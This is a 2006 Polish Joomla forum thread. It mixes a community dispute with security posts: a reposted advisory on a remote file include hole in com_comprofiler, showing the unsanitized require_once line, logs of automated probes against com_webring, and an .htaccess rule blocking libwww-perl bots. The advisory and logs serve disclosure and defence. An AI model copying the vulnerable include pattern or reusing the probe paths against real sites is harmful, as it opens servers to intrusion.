Pora na konkluzje: nie stawiaj warunków z tym czy z tamtem, ale bez tego. To najprostsza droga, żeby zostać samotnikiem. Jesteśmy, jacy jesteśmy i dzięki temu jest czasem wesoło, czasem śmiesznie, czasem irytująco, proza życia czy raczej poezja...
Ważne jest to, czy jesteś pożyteczny, czy nie wyrządzasz krzywdy, czy nawet wówczas, gdy robisz wyrzuty, to dla dobra postponowanego a nie obrony swojego ja, swojego interesu. Swój interes, jak będzie dobry, obroni się sam (no, promocji oczywiście w dzisiejszym świecie lekceważyć nie trzeba!).
A to co robisz Ty, Rybik, Sova, Viper, by wymienić tych, którzy się powyżej pojawili, jest użyteczne! Więc nie ma o co sobie psuć nerwów..., choć można sie czasem poirytować... z dystansem.

Jeszcze jedna kwestia na koniec - odnośnie tego "podkradania": znam prawie wszystko, co udostępniane jest w polskich serwisach (komponenty, moduły, dodatki). I przyznam, że nieraz jestem w kropce: opublikowac czy nie opublikować w naszym repozytorium.
Napisał "polonizator" że spolonizował moduł, zaglądam: spolonizowane piąte przez dziesiate.
Ba to jeszcze małe piwo - spolonizował... dodatek. Co spolonizował? Jedno zdanie, wyjaśniajace do czego jest dodatek. I opatrzył własnym nazwiskiem, mailem i adresem WWW. Śmiechu warte!
Z drugiej strony napracował się - zrobił rzecz większą. Fajnie - szukam info, a kto to zrobił wcześniej, na jakiej podstawie powstało to nowe opracowanie. I owszem - znajduję. Tyle że nie w skryptach tego nowego. Nigdzie żadnej wzmianki skąd toto się wzięło najpierw.
I wierz mi, nie robią tego ani josh, ani dylek, ani ja - a spolonizowaliśmy razem 99% tego, co jest spolonizowane. Choć zdarzyło się, że tłumaczyliśmy to samo... I na pewno w przypadku żadnego z nas jedno mniej jedno więcej tłumaczenie niczego nie zmienii. Więc może i do tego trzeba podejść całkiem spokojnie - ważne żeby bylo, a nie kto to zrobił...

No, tom się nagadał
Przybywaj, a jak trzeba będzie komuś po oczach, to najlepiej przez PW czy za moim pośrednictwem

Sova
17-08-2006, 15:13
Z całym szacunkiem, słów kilka:

Co do Jokrisa i poprzedniego pościka.


Będę brutalny w stosunku do mojego partnera, Sovy, i muszę napisać, że nieładnie, jak się wykorzystuje czyjeś artykuły, nie pisząc, kto jest ich autorem. Stąd moje "Hm.....
Chodzi Ci pewnie o napisanie na forum, że w kodzie podanym na JoomlaPL.com jest błąd - tak to rozumiem, bo żadnych artów w serwsie Twoich nie mam. Otóż jak się do kogoś ktoś włamuje to ten ktoś(czytaj:Sova) szuka sposobu by połatać ten cms, by było wszystko ok i jak się siedzi nad tym cholernym .htaccsessem mimo, że ma się urlop, mimo że żona chce robić ze mną zupełnie inne rzeczy, a każdą wolną chwilkę poświęca się mimo wszystko na siedzenie przed kompem to w końcu można zauważyć ten głupi błąd w kodzie-prawda? Nie mam do pobrania w serwisie tej paczuszki z poprawionych plikiem, ba nie napisałem nawet na stronce, że tam jest błąd - bo siedzę po nocach i nie mam czasu na poświęcenie go na to, na co bym chciał go poświęcić.
Tyle odnośnie tego.
----------------------------------

Co do prezentacji dodatków, artów, serwisu itd.
Ile już lat Panowie zajmujecie się Joomla (poprzednio Mambo)? Sami wiecie ile - pozwoliło Wam to na wypracowanie odpowiednich metod, zasad i tego wszystkiego co złożyło na się na obecne kaształty Waszych witryn poświęconych tym/temu cms'owi. Przypomnijcie Sobie jak wyglądały Wasze serwisy po pół roku prowadzenia - były idealne? Wątpię.
Grzebię w tym miesiąc dłużej od Jokrisa i zgodzę się w zupełności ze Zwiastunem, że Swoją cegiełkę On też dokłada do tego wszystkiego - bez dwóch zdań.
Ale nie każdy ma tyle samo czasu co inni, bo może ma trochę więcej obowiązków od innych (nawet od tych, którzy mieli dzieciństwo w latach 60-tych, choć jest tylko o 10 lat młodszy od nich). Mimo wszystko coś tam dłubie, najzwyczajniej stara się... może nawet w tym jest troszkę pasji, fascynacji. Wszystko to się skałda na POPULARYZACJI tego cms'a oraz Polskiego Centrum Joomla, a nie na konkurowaniu z PCJ pod każdym względem - to czasem też ktoś mógłby dostrzec.
Każdy jest otwarty na krytykę, ale tą konstruktywną i wyrażoną w kulturalny sposób - bo tylko taka mobilizuje do dalszej pracy. Natomiast zwyczajne "zjechanie" kogoś, za to że robi/mówi coś nie tak, powoduje u drugiej osoby niechęć/frustrację i ciężko choćby właśnie Jokrisowi nie przyznać odrobinki racji.

----------------------------------
Co do forum i postów.
O krytyce napisałem wyżej - odnosi się to także do odpowiedzi na niektóre posty, choć ciężko nie przyznać tu racji Zwiastunowi - kolejny raz, że ciężko mieć takie a nie inne podejście do ludzi, którzy chcieliby wszystko mieć "już teraz i zaraz" a sami nie potrafią poświęcić kilku minut/godziny na przeczytanie choćby samej intrukcji/pomocy Joomla. Też pewnie bym tak reagował, jakbym włożył tyle pracy co Wy w powstanie samej Pomocy - to najzwyczajniejszy brak szacunku dla twórców(Was) i nieumiejętność docenienia ich(Waszego) wkladu pracy w to, by poznanie tego cms'a przez innych było łatwiejsze i prostsze. (Te odpowiedzi na ich posty jestem w stanie zrozumieć).

Jest niestety też druga strona medalu - rozumiem, że czasem pytania się powtarzają (i będą powtarzać!). Czasem wystarczy komuś wskazać drogę do sposobu znalezienia odpowiedzi na jego pytania (link/szukajka na forum), ale są też pytania na które wystarczy odpowiedzieć komuś "tak/nie", "nie warto", "tak możesz zrobić" - a zamiast tego pojawia się litania dotycząca nieporadności w korzystania z forum przez danego użytkownika, a odpowiedzi brak.
Może i ma taka odpowiedź edukacyjny charakter (w kwestii obsługi i poruszania się po tym forum), ale nic nie stoi na przeszkodzie aby skrobnąć krótką odpowiedź a nad/pod nią napisać, aby dany delikwent następnym razem przed założeniem kolejnego wątku zachował się inaczej. Wy też zawsze i wszędzie czytacie wszystkie regulaminy?
Bo jeśli ktoś jest na forum pierwszy/drugi raz i spotyka się tylko ze zwykłym opierdzielaniem, to go to najzwyczajniej odstrasza i zniechęca - tym bardziej, że to opierdzielanie często ma mało przyjemną formę. Nowych użytkowników wypadałoby troszkę traktować, nazwijmy to "z pobłażliwscią". Nadmienię, że nie chodzi mi tu o "odpowiedź rzekę" (bo czasem trzeba się nieźle napisać) tylko, krótkie i zdawkowe odpowiedzi, nie chodzi mi tu też o formę "Drogi Panie prosimy przeczytać regulamin".
Uważam Was za inteligentnych ludzi-więc powinniście zrozumieć o co mi chodzi.

Bo czasem to wszystko wygląda tak, jakby biedny student przyszedł do znakomitego profesora z błachym pytaniem na które nie potrafi znaleźć odpowiedzi, a ten mu mówi żeby sobie on poszukał odpowiedzi na ten problem w bibliotece, w jego książkach i publikacjach.
Wystrczyłoby, żeby ten profesor powiedział temu studentowi, że odpowiedź znajdzie tu i tu, w książce(poście) o takim tytule(wystarczy czasem link), lub podał hasło pod jakim szukać tej pozycji w bibliotece(szukajka na Forum i Pomocy).
Czy to tak wiele?

Pozdrawiam.

Dylek
18-08-2006, 19:18
A od kiedy na SWOJEJ stronie nie moge reklamowac tego, co chce? Uwazam, ze reklamy jakie sie wyswietlaja na joomlapl.com nie sa z gatunku godzacych w czyjes poczucie smaku badz przekonania religijne, wiec w czym problem?
Jokris - moge Ci podac numer konta jak chcesz - zostan moim sponsorem, a obiecuje zaprzestac wyswietlania reklam.

PS. Uwazam ze czas zamknac ten temat, bo robi sie niesmaczny, nie na temat i nikomu niepotrzebny. Prywatne wycieczki proponuje rozgrywac na GG, Tlenie, Skype czy wrecz przez telefon lub na zywo.

snifer
14-09-2006, 05:36
Mambo/Joomla com_comprofiler Components <== v1.0 RC 2 Multiple Remote File Include Vulnerabilities

------------------------------------------------------------------------
---

Author : Matdhule

Date : August, 25th 2006

Location : Indonesia, Jakarta

Critical Lvl : Highly critical

Impact : System access

Where : From Remote

------------------------------------------------------------------------
---

Affected software description:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

com_comprofiler Components

Application : com_comprofiler

version : 1.0 RC 2

------------------------------------------------------------------------
---

Vulnerability:

~~~~~~~~~~~~~~~

in folder com_comprofiler we found vulnerability script plugin.class.php

-----------------------plugin.class.php----------------------

<?php

/**

* Plugin handler

* @package Joomla

* @author various, JoomlaJoe and Beat

*/

require_once( $mosConfig_absolute_path . '/includes/domit/xml_domit_lite_include.php' );

----------------------------------------------------------

Variables $mosConfig_absolute_path are not properly sanitized.

rkubera
14-09-2006, 11:51
Z zawodu jestem elektronikiem, i zajmowałem się naprawą komputerów. Tak naprawdę, to gdzieś od lutego tego roku zacząłem poznawać systemy CMS, i uczyć się PHP..... Hmm.. Może i ja swoje CV zamieszczę ?
A co z tymi włamami?
Pozdrawiam.

jokris
14-09-2006, 17:16
Hmm.. Może i ja swoje CV zamieszczę ?
A co z tymi włamami?
Pozdrawiam. Pozdrawiam też. Poczytaj, czego dotyczy post. Ok?.:)A swoją drogą to niezły pomysł z tym CV. Widać, że masz głowę nie od parady. Bo może wtedy nie było by tyle nieporozumień na forum. Ten post absolutnie nie jest jakimś przytykiem do ciebie, bo akurat wiem czym się zajmujesz, i co robisz dla Joomla na swojej stronie. Nawet powiesiłem informacje o tobie w jakimś moim artykule. Adres mojego "CV" jest w podpisie, zapraszam. Wpisz w wyszukiwarkę "Radek Kubera", najprościej. Bo, ciągnąc dalej, w przeciwieństwie do innych (innego, przepraszam), mądrych, napisałeś kilka botów i modułów, a ja to cenię. Tylko czemu tak późno piszesz?. I czemu nie zająłeś stanowiska w sprawie wcześniejszego, bezsensownego postu niejakiego "Snifera"?. A co do włamań, to już chyba nie to miejsce, chyba ze sie mylę?. W celu dalszej rozmowy, o ile zajdzie konieczność, zapraszam ciebie i inych na GG ( nie zawsze jestem obecny na gadulcu, ale mozna trafić). Widnieje w moim podpisie. Pozdro. Jokris.:)

rkubera
14-09-2006, 17:27
Wiem Jokris, pamiętam, że powiesiłeś moje moduły na swojej stronie, dzięki, miło patrzeć.:)
To nie był przytyk do Ciebie, tylko do wszystkich, co niepotrzebnie zbaczają z tematu. I to nie tylko na tym forum.
A piszę późno bo brak czasu :-D
A o Sniferze nie pisałem, bo go nie zrozumiałem ;-)

Więc trochę uśmiechów w ten dzień,
Radek.

jokris
14-09-2006, 18:22
Przyznam się, że ja go też nie rozumię, oczywiście Snifera,, a właśnie jego post otzrymałem na pocztę jako subskrypcję wątku, więc zajrzałem na forum. Ale to było w nocy, o 4:36, więc może zmęczony był ów człowiek?. Też życzę uśmiechów, bo tak mało mamy ich na codzień. Pozdrawiam. Jokris.:):):)

snifer
14-09-2006, 18:34
a niby czemu zboczylem z tematu ???
napisalem tylko w czym dziura...

takich dziur jest od zaje....
a co najfajniejsze juz pojawili sie boty skanujace siec w poszukiwaniu
dziurawych mambo i joomla i nie mowie tu do CB
tylko glownie poszukuja jak zwykle dziurawych RSS x-shop'a etc

jokris
14-09-2006, 21:15
a niby czemu zboczylem z tematu ???
napisalem tylko w czym dziura...Spokojnie, już zaskoczyłem, że chodzi Ci o dziurawy Komponent com_comprofiler, i nie zabezpieczony plik plugin.class.php. To jest cenna informacja, tylko jakiś wstępik byś dodał, np. przeczytałem tam gdzies że: i tutaj kod. Pozatym już chyba ktoś o tym pisał. Dużo uśmichów i popraw gramatykę i stylistykę, bo szefem forum jest polonista!:) . Wrzuć tekst do Worda, i poprawiony wstaw w post. Najprościej. Pozdrawiam. Jokris.:):)

snifer
14-09-2006, 21:25
1* o 4 rano to za duzo od czlowieka nie mozna wymagac
2* jesli komus przeshkadza pisownia to niech zagada o moda i poprawia sobie posty

.end

Sova
15-09-2006, 10:53
Są wykonywane przez ludzi zawody, od których o 4 rano wymaga się by byli w pełni skoncentrowani - na tym co robią. W tym przypadku rzecz ma się Snifer o to, że taka odpowiednia/właściwa pisownia to wyrażenie szacunku dla czytających - niektórym to właśnie "przeszkadza".

Cytat z regulaminu forum:
"Błąd ortograficzny to nie tragedia, ale wskazane jest, aby osoby z dysortografią przed opublikowaniem posta sprawdzały pisownię w edytorze tekstu."

P.S.
Skończmy dyskusję nt. pisania postów i zakładania tematów(to jest omówione w regulaminie) - to nie miejsce na to - brak związku ze sprawami bezpieczeństwa Joomla!

snifer
15-09-2006, 11:15
jesli chodzi o offtopic's to racja ...

wiec moge do dyskusji dodac jedno
kozystajcie z serwisow
http://www.securityfocus.com
http://packetstormsecurity.org

szybciej mozna sie dowiedziec o dziurach w joomli niz z joomla.org
;) a za czym idzie fakt ze moze to uchronic przed porzegnaniem sie
z plikami wlasnej stronki

a i jeszcze jedno OpenSef nawet najnowsza wersja jest bardzo dziurawa
daje mozliwosc odpalenia dowolnego kodu zdalnie

zwiastun
15-09-2006, 11:25
do snifera:
Nie w tym rzecz, że komuś przeszkadza. W tym, że:
- wprowadza w błąd innych,
- utrudnia wyszukiwanie,
- utrudnia czytanie,
- utrudnia rozumienie i
- mówi cos niezbyt dobrego o autorze.
Sporo powodów, by starać się pisać jasno i bez błędów.

Z miłą chęcią powierzymy Ci rolę moda do poprawiania błędów :)
I nie ma się co i po co obruszac na uwagi. Nikt tu nikomu nie chce zrobić na złość.

snifer
15-09-2006, 11:35
ok rozumie

hazael
20-11-2006, 01:30
Dziś w nocy w moim skrypciku do łapania robotów wyczaiłem prawdopodobną probe ataku hackerow na moją strone. Wykonano kilka tysięcy zapytań z bardzo wielu miejsc na swiecie. Na szczescie atak im sie nie udał bo nie korzystam i nigdy nie korzystałem z komponentu webring, ktory chcieli shackowac u mnie :)

oto przykładowy wycinek moich logów

2006-11-18 18:43:55 |**| libwww-perl/5.803 |**| 203.250.148.62 |**| les.piekielko.pl/index.php?option=com_webring&Itemid=71/administrator/components/com_webring/admin.webring.docs.php
2006-11-18 18:44:09 |**| libwww-perl/5.803 |**| 85.92.129.209 |**| les.piekielko.pl/index.php?option=com_webring&Itemid=71/administrator/components/com_webring/admin.webring.docs.php
2006-11-18 18:44:10 |**| libwww-perl/5.79 |**| 64.76.24.214 |**| les.piekielko.pl/index.php?option=com_webring&Itemid=71/administrator/components/com_webring/admin.webring.docs.php
2006-11-18 18:44:13 |**| libwww-perl/5.805 |**| 69.26.184.3 |**| les.piekielko.pl/index.php?option=com_webring&Itemid=71/administrator/components/com_webring/admin.webring.docs.php
2006-11-18 18:44:17 |**| libwww-perl/5.800 |**| 216.130.161.111 |**| les.piekielko.pl/index.php?option=com_webring&Itemid=71/administrator/components/com_webring/admin.webring.docs.php
2006-11-18 18:44:21 |**| libwww-perl/5.65 |**| 216.70.125.211 |**| les.piekielko.pl/index.php?option=com_webring&Itemid=71/administrator/components/com_webring/admin.webring.docs.php
2006-11-18 18:44:22 |**| libwww-perl/5.803 |**| 83.243.154.180 |**| les.piekielko.pl/index.php?option=com_webring&Itemid=71/administrator/components/com_webring/admin.webring.docs.php
2006-11-18 18:44:23 |**| libwww-perl/5.805 |**| 205.234.99.226 |**| les.piekielko.pl/index.php?option=com_webring&Itemid=71/administrator/components/com_webring/admin.webring.docs.php
2006-11-18 18:44:26 |**| libwww-perl/5.803 |**| 83.243.154.180 |**| les.piekielko.pl/index.php?option=com_webring&Itemid=71/administrator/components/com_webring/admin.webring.docs.php
2006-11-18 18:44:27 |**| libwww-perl/5.803 |**| 211.176.61.146 |**| les.piekielko.pl/index.php?option=com_webring&Itemid=71/administrator/components/com_webring/admin.webring.docs.php

Zabawka do hackowania stron jest wykonana w Perlu i aby uniemozliwić zablokowania IP ataki odbywają się prawie za kazdym razem z innego adresu. Dodatkowym pomysłem hackera jest ciągła zmiana nazwy robota/agenta, ktorym się on identyfikuje.

Na szczescie mozna w bardzo prosty sposób zablokować to dziadostwo w pliku .htaccess Dla samej profilaktyki radze wszystkim aby sobie wpisali w tym pliku na samym dole te dwie krotkie linijki - oszczedzicie przy okazji niepotrzebnie pozerany transfer w trakcie prob ataku :)


SetEnvIfNoCase User-Agent "^libwww-perl*" block_bad_bots
Deny from env=block_bad_bots

rkubera
20-11-2006, 11:33
Miałem to samo dokładnie 18 rano. Atak na stare mambo 4.5.2, ale do innych komponentów, ten sam algorytm. Mi próbwali wjechać przez extcalendar, bez efektu. Aż mi delikatnie serwer przysiadł, pokazywało mi do 2000 jednoczesnych sesji :eek:

Ciekawe czy gdzieś się włamali tym skryptem, mi głównie zaszkodzili obciążeniem.
Pozdrawiam.

hazael
20-11-2006, 12:23
Znalezli nowy sposob na to, aby uprzykrzyc swoim ofiarom życie - wywołują tysiace zapytan najczesciej pod ten sam adres, aby przy próbie hackowania przy okazji pozrec transfery, na ktore są nałozone limity. W najczestrzych przypadkach po przekroczeniu takiego limitu witryna przestaje działać, więc rezultat tych działań ma podobny finał.

Mi w ciągu dnia pozarli ok 1GB transferu. Teraz licząc cały miesiac wychodzi ok 30GB + standardowo zwykły ruch na stronie... Nie wszyscy mają tak mocne konta by coś takiego wytrzymały...